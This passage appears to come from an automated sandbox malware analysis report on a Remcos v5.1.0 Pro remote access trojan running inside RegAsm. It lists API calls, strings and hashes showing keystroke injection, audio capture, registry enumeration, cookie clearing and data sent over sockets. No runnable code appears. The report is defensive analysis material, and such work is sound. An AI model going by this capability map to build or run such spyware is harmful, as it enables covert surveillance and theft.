                                                          • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                                          APIs
                                                          • AllocConsole.KERNEL32 ref: 0041CDA4
                                                          • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$Window$AllocOutputShow
                                                          • String ID: Remcos v$5.1.0 Pro$CONOUT$$[
                                                          • API String ID: 4067487056-4123820487
                                                          • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                                          • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                                          • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                          • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                                          • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                                          • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • _memcmp.LIBVCRUNTIME ref: 00445423
                                                          • _free.LIBCMT ref: 00445494
                                                          • _free.LIBCMT ref: 004454AD
                                                          • _free.LIBCMT ref: 004454DF
                                                          • _free.LIBCMT ref: 004454E8
                                                          • _free.LIBCMT ref: 004454F4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                          • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                                          • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                                          • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                                          • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                                          • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                                          APIs
                                                          • __Init_thread_footer.LIBCMT ref: 004018BE
                                                          • ExitThread.KERNEL32 ref: 004018F6
                                                          • waveInUnprepareHeader.WINMM(?,00000020,00000000), ref: 00401A04
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                          • String ID: PkG$NG$NG$[
                                                          • API String ID: 1649129571-3116835393
                                                          • Opcode ID: 8f2e842e372602a7d79eebcfb191546b61a3b2df91fcf8c709632801aceb149a
                                                          • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                                          • Opcode Fuzzy Hash: 8f2e842e372602a7d79eebcfb191546b61a3b2df91fcf8c709632801aceb149a
                                                          • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 004079C5
                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A0D
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • CloseHandle.KERNEL32(00000000), ref: 00407A4D
                                                          • MoveFileW.KERNEL32 ref: 00407A6A
                                                          • CloseHandle.KERNEL32(00000000), ref: 00407A95
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                          • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                                          • Opcode Fuzzy Hash: f1cb0ead7d2d2b2a1caa9b1fbd2e08d67abddaf9d20ca2f7b8d78d50525d07aa
                                                          • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 004199CC
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 004199ED
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A0D
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A21
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A37
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A54
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A6F
                                                          • SendInput.USER32(00000001,?,0000001C), ref: 00419A8B
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend
                                                          • String ID:
                                                          • API String ID: 3431551938-0
                                                          • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                                          • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                                          • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea$__alloca_probe_16_free
                                                          • String ID: a/p$am/pm$zD
                                                          • API String ID: 2936374016-2723203690
                                                          • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                          • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                                          • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                                          • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                                          APIs
                                                          • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710), ref: 00413B8B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Enum$InfoQueryValue
                                                          • String ID: [regsplt]$xUG$TG
                                                          • API String ID: 3554306468-1165877943
                                                          • Opcode ID: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                                          • Opcode Fuzzy Hash: b730b8f01de3b61de9bdc309d271c932a797a33a56bfebd36572143352d58066
                                                          • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                                          APIs
                                                          • GetConsoleCP.KERNEL32 ref: 100094D4
                                                          • __fassign.LIBCMT ref: 1000954F
                                                          • __fassign.LIBCMT ref: 1000956A
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 10009590
                                                          • WriteFile.KERNEL32(?,?,00000000,10009C07,00000000), ref: 100095AF
                                                          • WriteFile.KERNEL32(?,?,00000001,10009C07,00000000), ref: 100095E8
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction ID: 7b1e32e7ca62d622bc6abd4954a79b3a1191cf35157f5551c2bc05612337e78d
                                                          • Opcode Fuzzy Hash: c8cde1f94c5a3c187481f919a86e285046f284bf183baf255f965bcae4dd5098
                                                          • Instruction Fuzzy Hash: D7519271D00249AFEB10CFA4CC95BDEBBF8EF09350F15811AE955E7295D731AA41CB60
                                                          APIs
                                                          • GetConsoleCP.KERNEL32 ref: 0044B3FE
                                                          • __fassign.LIBCMT ref: 0044B479
                                                          • __fassign.LIBCMT ref: 0044B494
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                          • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000), ref: 0044B4D9
                                                          • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000), ref: 0044B512
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                          • String ID:
                                                          • API String ID: 1324828854-0
                                                          • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                          • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                          • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: D[E$D[E
                                                          • API String ID: 269201875-3695742444
                                                          • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                                                          • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                                                          • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32 ref: 00413D46
                                                            • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                                            • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00413AEB
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 00413EB4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnumInfoOpenQuerysend
                                                          • String ID: xUG$NG$NG$TG
                                                          • API String ID: 3114080316-2811732169
                                                          • Opcode ID: 2741ae2de75677ea4f0a6357f0554a3f03cb5b3aca642d15392f9de8a49b04c1
                                                          • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                                          • Opcode Fuzzy Hash: 2741ae2de75677ea4f0a6357f0554a3f03cb5b3aca642d15392f9de8a49b04c1
                                                          • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 1000339B
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 100033A3
                                                          • _ValidateLocalCookies.LIBCMT ref: 10003431
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 1000345C
                                                          • _ValidateLocalCookies.LIBCMT ref: 100034B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction ID: 0a936c430148d26a69835db3fa9f683d01d5328c1142e13f0191aacd949c771e
                                                          • Opcode Fuzzy Hash: 314e045d64bd9dff90e147ebc0021a06731dbc25050b3dab86f6a1545ce1a07e
                                                          • Instruction Fuzzy Hash: D141D678E042189BEB12CF68C880A9FBBF9EF453A4F10C155E9159F25AD731FA01CB91
                                                          APIs
                                                            • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                            • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                            • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                          • API String ID: 1133728706-4073444585
                                                          • Opcode ID: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction ID: 11f9a5ab4d81baf10890d677fe2d2a0774849eb970c5828eb217b404dd8a17fe
                                                          • Opcode Fuzzy Hash: 64fa2848a199bd2a40e0896628174b15822387fc8284c7b97a1890df31b02a60
                                                          • Instruction Fuzzy Hash: 38215271A4021AA6CB04F7B2CC569EE77699F10704F40017FE506B71D2EF7899498ADE
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                          • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                                          • Opcode Fuzzy Hash: 0d17155dc6db7c30058fdf5bf10590413c3ccf5281d5a9a865ac9745ee25c2fc
                                                          • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                                          APIs
                                                            • Part of subcall function 10009221: _free.LIBCMT ref: 1000924A
                                                          • _free.LIBCMT ref: 100092AB
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100092B6
                                                          • _free.LIBCMT ref: 100092C1
                                                          • _free.LIBCMT ref: 10009315
                                                          • _free.LIBCMT ref: 10009320
                                                          • _free.LIBCMT ref: 1000932B
                                                          • _free.LIBCMT ref: 10009336
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction ID: 62dea9ede071ec04ae7e8d39c2d2a9b8d59ba4565e42afa4a1a73bd13a3591d1
                                                          • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                                                          • Instruction Fuzzy Hash: 3E118E35548B08FAFA20EBB0EC47FCB7B9DEF04780F400824BA9DB6097DA25B5249751
                                                          APIs
                                                            • Part of subcall function 00450C41: _free.LIBCMT ref: 00450C6A
                                                          • _free.LIBCMT ref: 00450F48
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00450F53
                                                          • _free.LIBCMT ref: 00450F5E
                                                          • _free.LIBCMT ref: 00450FB2
                                                          • _free.LIBCMT ref: 00450FBD
                                                          • _free.LIBCMT ref: 00450FC8
                                                          • _free.LIBCMT ref: 00450FD3
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction ID: d9348172fd0740f80504453a64c2ebf0df3e8af845a5f6206b1ac0666941ab15
                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                          • Instruction Fuzzy Hash: B411A231540B04AAD625BB72CC47FCB779CAF0230BF44491EBEED66053D6ACB9085745
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                                          • int.LIBCPMT ref: 00411183
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 004111C3
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                          • String ID: (mG
                                                          • API String ID: 2536120697-4059303827
                                                          • Opcode ID: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                                          • Opcode Fuzzy Hash: 4358ddd6f05c9e1b133220cf21f5160a6bdd3ecf1c15f3e73f45c2fde7630a6a
                                                          • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                                          • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                                          Memory Dump Source
